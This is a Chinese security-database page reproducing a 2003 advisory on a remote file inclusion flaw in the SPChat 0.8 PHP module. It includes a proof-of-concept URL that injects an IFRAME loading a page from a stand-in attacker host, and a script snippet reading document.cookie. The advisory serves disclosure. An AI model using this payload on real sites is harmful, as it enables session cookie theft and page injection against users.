SPChat 0.8 Module – Remote File Inclusion

SPChat 0.8 Module – Remote File Inclusion

漏洞ID 1053919 漏洞类型
发布时间 2003-06-02 更新时间 2003-06-02
图片[1]-SPChat 0.8 Module – Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-SPChat 0.8 Module – Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22717
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7780/info

SPChat has been reported prone to a remote file include vulnerability.

The issue presents itself due to insufficient sanitization performed on the user-supplied URI variable 'statussess' by the SPChat module. It is possible for a remote attacker to include a malicious file in a URL.

This vulnerability was reported to affect SPChat version 0.8 other versions may also be affected. 

http://www.example.com/modules.php?op=modload&name=SPChat&file=index&statussess=<IFRAME%20src="http://www.attacker.com/attack.htm"%20marginWidth=0%20marginHeight=0%20fr
ameBorder=0%20width=500%20scrolling=yes%20height=500></IFRAME>

----- Source Code For attack.htm for eg. -----
?script>
alert(document.cookie);
?/script>
----- Source Code For attack.htm -----

相关推荐: SSH-1协议私钥计算漏洞

SSH-1协议私钥计算漏洞 漏洞ID 1206013 漏洞类型 加密问题 发布时间 2001-01-18 更新时间 2001-01-18 CVE编号 CVE-2001-1473 CNNVD-ID CNNVD-200101-122 漏洞平台 N/A CVSS评分…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享